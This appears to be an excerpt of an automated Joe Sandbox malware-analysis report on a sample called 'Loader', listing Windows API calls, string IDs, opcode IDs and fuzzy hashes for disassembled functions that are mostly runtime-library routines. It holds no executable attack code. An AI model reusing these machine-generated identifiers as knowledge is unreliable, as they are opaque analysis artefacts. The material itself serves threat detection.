                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FreeLibrary
                                                                                      • String ID: api-ms-$ext-ms-
                                                                                      • API String ID: 3664257935-537541572
                                                                                      • Opcode ID: 2503fe27a4291bbb70ca70118ab424eff6ce6cfc97399885e4fe279cb8f02e19
                                                                                      • Instruction ID: 183e748655444b38fe17f810afcff31fed1cb94187e26b8f9f0295e8f87f44a4
                                                                                      • Opcode Fuzzy Hash: 2503fe27a4291bbb70ca70118ab424eff6ce6cfc97399885e4fe279cb8f02e19
                                                                                      • Instruction Fuzzy Hash: 3B212B31A51255ABDF21DF25EC88F5E7768EF02760F144B28ED15AB290D770EE20C6D1
                                                                                      APIs
                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 002B6A66
                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 002B6A74
                                                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002B6A85
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressProc$HandleModule
                                                                                      • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                      • API String ID: 667068680-1047828073
                                                                                      • Opcode ID: 64aa3bf94088d2146a407e543d241479ac0af04c2fc595ac06ababee9721af57
                                                                                      • Instruction ID: 309ad000c46263ebd0f7f6ec5ed1f895067efd37c55d5d080c0e25c54c8b3bd6
                                                                                      • Opcode Fuzzy Hash: 64aa3bf94088d2146a407e543d241479ac0af04c2fc595ac06ababee9721af57
                                                                                      • Instruction Fuzzy Hash: 93D0C7355E12505FE710EFB07D4D8D53BD5EA0AB113068577F445DA350EBB409258B91
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6ec00540541a3b1f95641be8ee1eb7e7c8f115cf9f7f5623a6b03f0a794f4567
                                                                                      • Instruction ID: 06f34bb924b0074be346da55ebb07338287e056f71b68489547374eaac90becc
                                                                                      • Opcode Fuzzy Hash: 6ec00540541a3b1f95641be8ee1eb7e7c8f115cf9f7f5623a6b03f0a794f4567
                                                                                      • Instruction Fuzzy Hash: D5B10270E2424AAFDB11DF98D8C1BAD7BB0AF45304F14425BE904AB3A2D7709D61CF65
                                                                                      APIs
                                                                                      • GetLastError.KERNEL32(?,?,002C105E,002B7150,002B388F,83182907,?,?,?,?,002D2FDF,000000FF,?,002A9085), ref: 002C1075
                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 002C1083
                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 002C109C
                                                                                      • SetLastError.KERNEL32(00000000,?,002C105E,002B7150,002B388F,83182907,?,?,?,?,002D2FDF,000000FF,?,002A9085), ref: 002C10EE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                      • String ID:
                                                                                      • API String ID: 3852720340-0
                                                                                      • Opcode ID: 20f4914e222f03609946f622d685d2b763911f986a62cb140c19a456f7a0f4ec
                                                                                      • Instruction ID: f85e7d237785618f6f48cc31393508b78b9bec04ed75ae73722c979faa0500cd
                                                                                      • Opcode Fuzzy Hash: 20f4914e222f03609946f622d685d2b763911f986a62cb140c19a456f7a0f4ec
                                                                                      • Instruction Fuzzy Hash: 0801B5331782D25EA6242AB57CCEF6B2B94DF177B4720433DF914494F2EE5148B29A80
                                                                                      APIs
                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 002C1A0D
                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 002C1C86
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallUnexpectedtype_info::operator==
                                                                                      • String ID: csm$csm$csm
                                                                                      • API String ID: 2673424686-393685449
                                                                                      • Opcode ID: a30b1c4f209990e8a993ef597e52b0239d95a172aed12ddd52d3c846fc054e5c
                                                                                      • Instruction ID: dc02b607f3d6ef807cc06055a1773860b2e4c777e57c0edc427d46cf38836187
                                                                                      • Opcode Fuzzy Hash: a30b1c4f209990e8a993ef597e52b0239d95a172aed12ddd52d3c846fc054e5c
                                                                                      • Instruction Fuzzy Hash: BBB14A7182020ADFCF28DFA4C882FAEB7B5AF16314B14465EE8156B212D371DA71CF95
                                                                                      APIs
                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,83182907,?,?,00000000,002D2EA9,000000FF,?,002BBE39,002BBD20,?,002BBED5,00000000), ref: 002BBDAD
                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 002BBDBF
                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,002D2EA9,000000FF,?,002BBE39,002BBD20,?,002BBED5,00000000), ref: 002BBDE1
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: 6eeb4a0a0bcb01d8e98071a13463797d2f49d0dcdfd8cfad000a0ba0abd35182
                                                                                      • Instruction ID: a441587c1e550c601248271dafc6c5570d384cdb6844b81f6bec1615d2b62caa
                                                                                      • Opcode Fuzzy Hash: 6eeb4a0a0bcb01d8e98071a13463797d2f49d0dcdfd8cfad000a0ba0abd35182
                                                                                      • Instruction Fuzzy Hash: 4B01A731AA4656EFDB129F54DC49FEEB7B8FB05B51F000126E811A6690DBB49C10CA40
                                                                                      APIs
                                                                                      • __alloca_probe_16.LIBCMT ref: 002C3A4F
                                                                                      • __alloca_probe_16.LIBCMT ref: 002C3B18
                                                                                      • __freea.LIBCMT ref: 002C3B7F
                                                                                        • Part of subcall function 002C2291: RtlAllocateHeap.NTDLL(00000000,002C4215,?,?,002C4215,00000220,?,?,?), ref: 002C22C3
                                                                                      • __freea.LIBCMT ref: 002C3B92
                                                                                      • __freea.LIBCMT ref: 002C3B9F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1423051803-0
                                                                                      • Opcode ID: 5bc8404dd043d38e745665cf31bd25973ed44c6999f62ed10bbf8944f2e1dc11
                                                                                      • Instruction ID: 53f8e9f982ede2b954604c707c24ba002291d9fef4bf67a967451c6204d5e0c3
                                                                                      • Opcode Fuzzy Hash: 5bc8404dd043d38e745665cf31bd25973ed44c6999f62ed10bbf8944f2e1dc11
                                                                                      • Instruction Fuzzy Hash: DF51C372620206AFEB20DE658C89FBB37A9DF44714B158A2DFD04D6101EB70DE70DA60
                                                                                      APIs
                                                                                      • GetCurrentThreadId.KERNEL32 ref: 002B5CF5
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,002AB43E), ref: 002B5D14
                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,002AB43E), ref: 002B5D42
                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,002AB43E), ref: 002B5D9D
                                                                                      • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,002AB43E), ref: 002B5DB4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AcquireExclusiveLock$CurrentThread
                                                                                      • String ID:
                                                                                      • API String ID: 66001078-0
                                                                                      • Opcode ID: 5f418ca06093d389e4efa9baec8fa61acc3be2cb0119e93876fa07fa848bb518
                                                                                      • Instruction ID: 7c660e248ee75d04ab382ca12a101d07b6113ecbb5f44e1492461b183dd0a318
                                                                                      • Opcode Fuzzy Hash: 5f418ca06093d389e4efa9baec8fa61acc3be2cb0119e93876fa07fa848bb518
                                                                                      • Instruction Fuzzy Hash: B8413634520E2BDBCB20CF64C488BEAB3F5FF08390B204A29E4568B540D730E9A5CF50
                                                                                      APIs
                                                                                      • __EH_prolog3.LIBCMT ref: 002B3129
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 002B3134
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 002B31A2
                                                                                        • Part of subcall function 002B302A: std::locale::_Locimp::_Locimp.LIBCPMT ref: 002B3042
                                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 002B314F
                                                                                      • _Yarn.LIBCPMT ref: 002B3165
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                      • String ID:
                                                                                      • API String ID: 1088826258-0
                                                                                      • Opcode ID: 2524330b47e9b8b9e9a887726a58588bc07c8b9b02871872aeba6996ba877244
                                                                                      • Instruction ID: 495b9ae747b9c689961cfaacbca3d47534ee98a070126b07f6a86fba48795dd7
                                                                                      • Opcode Fuzzy Hash: 2524330b47e9b8b9e9a887726a58588bc07c8b9b02871872aeba6996ba877244
                                                                                      • Instruction Fuzzy Hash: D501BC31A60251DBCB06EF24E8895BC77B5FF94390B140049E8121B381CF386E66CB81
                                                                                      APIs
                                                                                        • Part of subcall function 002C24EA: GetLastError.KERNEL32(00000000,?,002C486D), ref: 002C24EE
                                                                                        • Part of subcall function 002C24EA: SetLastError.KERNEL32(00000000,?,?,00000028,002BEB13), ref: 002C2590
                                                                                      • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,002BC389,?,?,?,00000055,?,-00000050,?,?,?), ref: 002C6CD5
                                                                                      • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,002BC389,?,?,?,00000055,?,-00000050,?,?), ref: 002C6D0C
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast$CodePageValid
                                                                                      • String ID: P.USA$utf8
                                                                                      • API String ID: 943130320-4222553367
                                                                                      • Opcode ID: b711bca9d3aeb9704f697c43e282e5159823f605c64dc012b8e7e5408b5f96c1
                                                                                      • Instruction ID: 923b89b33e4ce985dd39a54f5fafd73acdc20b655528107a55a6f6368b24de10
                                                                                      • Opcode Fuzzy Hash: b711bca9d3aeb9704f697c43e282e5159823f605c64dc012b8e7e5408b5f96c1
                                                                                      • Instruction Fuzzy Hash: 9151F675624707AADB24AF70CC4EFA673A8EF44700F14062EF9459B181F670EA709BA1
                                                                                      APIs
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,002CD20C,?,?,00000000,?,?,?,002CD0CA,00000002,FlsGetValue,002D81E4,002D81EC), ref: 002CD17D
                                                                                      • GetLastError.KERNEL32(?,002CD20C,?,?,00000000,?,?,?,002CD0CA,00000002,FlsGetValue,002D81E4,002D81EC,?,?,002C1088), ref: 002CD187
                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,000000FF,?,002A9085), ref: 002CD1AF
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                      • String ID: api-ms-
                                                                                      • API String ID: 3177248105-2084034818
                                                                                      • Opcode ID: a25e4c953248a3c2a8aa91b0355610d1f2442f44e020e30d14eb46903f316108
                                                                                      • Instruction ID: 24e3ec738747f0a0e3c4d1a420ee4df6c177b03a2777c6a66edb2dfce2f9fe53
                                                                                      • Opcode Fuzzy Hash: a25e4c953248a3c2a8aa91b0355610d1f2442f44e020e30d14eb46903f316108
                                                                                      • Instruction Fuzzy Hash: 24E01A70290245BBFB202F65EC4AF2D3BA5AB10B84F184534FA0CA80E1D7B298718944
                                                                                      APIs
                                                                                      • GetConsoleOutputCP.KERNEL32(83182907,00000000,00000000,?), ref: 002CA2A1
                                                                                        • Part of subcall function 002C23A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002C3B75,?,00000000,-00000008), ref: 002C2402
                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 002CA4F3
                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 002CA539
                                                                                      • GetLastError.KERNEL32 ref: 002CA5DC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                      • String ID:
                                                                                      • API String ID: 2112829910-0
                                                                                      • Opcode ID: 43a652a590f183687bc331d1339c5c0d953f874083fa3c5a9666d6e9cbd76352
                                                                                      • Instruction ID: d46219f63cd13ec1652f651f756a08aaf3ec29093d3b3d643b9fc46c10b6ac79
                                                                                      • Opcode Fuzzy Hash: 43a652a590f183687bc331d1339c5c0d953f874083fa3c5a9666d6e9cbd76352
                                                                                      • Instruction Fuzzy Hash: 0CD179B5D1028C9FCB15CFA8D884AADBBB5FF08314F24826EE856EB251D630A951CF51
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: AdjustPointer
                                                                                      • String ID:
                                                                                      • API String ID: 1740715915-0
                                                                                      • Opcode ID: 88f178866ea3159ec78cb4443eaa326dd04e776045919984a2d085dcfca8774b
                                                                                      • Instruction ID: 3227de9a4bfd83deb50f434fdc9592ee82a5adb1a6c2fd9ac80f74e9656b7a2f
                                                                                      • Opcode Fuzzy Hash: 88f178866ea3159ec78cb4443eaa326dd04e776045919984a2d085dcfca8774b
                                                                                      • Instruction Fuzzy Hash: 5051E571A21202DFDB298F14D987FA9B7A8EF52340F24422DE85647292D731EC75CF90
                                                                                      APIs
                                                                                        • Part of subcall function 002C23A1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,002C3B75,?,00000000,-00000008), ref: 002C2402
                                                                                      • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C80CA
                                                                                      • __dosmaperr.LIBCMT ref: 002C80D1
                                                                                      • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 002C810B
                                                                                      • __dosmaperr.LIBCMT ref: 002C8112
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                      • String ID:
                                                                                      • API String ID: 1913693674-0
                                                                                      • Opcode ID: e6ac4d2cc4bcbf5148db8fb56eee4447c0bef510e0d5b2db15b696bff2e196eb
                                                                                      • Instruction ID: 6917be0d06c2669e54a2898b58f7a80a5105972e4f9e2e659392a02ae8e35cb5
                                                                                      • Opcode Fuzzy Hash: e6ac4d2cc4bcbf5148db8fb56eee4447c0bef510e0d5b2db15b696bff2e196eb
                                                                                      • Instruction Fuzzy Hash: E621B831620216AF9B20AF61C881EAB77E9EF05364714CA1CF91997110EB71EC608F51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.3526354376.00000000002A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.3526310768.00000000002A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526419418.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526484600.00000000002E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526519722.00000000002E6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526556477.00000000002EA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.3526602591.00000000002EE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_2a0000_Loader.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2405b6ca504f8740c24341dab4b2f58b887bf50b90a24aaf26cf3cc89a8d6cf8
                                                                                      • Instruction ID: 75ef817e0b2a21fd7a0420f6bfe2aa7a15a283e327b2f082b7dccc3af5e4f701
                                                                                      • Opcode Fuzzy Hash: 2405b6ca504f8740c24341dab4b2f58b887bf50b90a24aaf26cf3cc89a8d6cf8
                                                                                      • Instruction Fuzzy Hash: 2421A13162020AAF9B20AF65CC809EB77ADEF413E47144525FB1997241EB30ECF0CB60
                                                                                      APIs
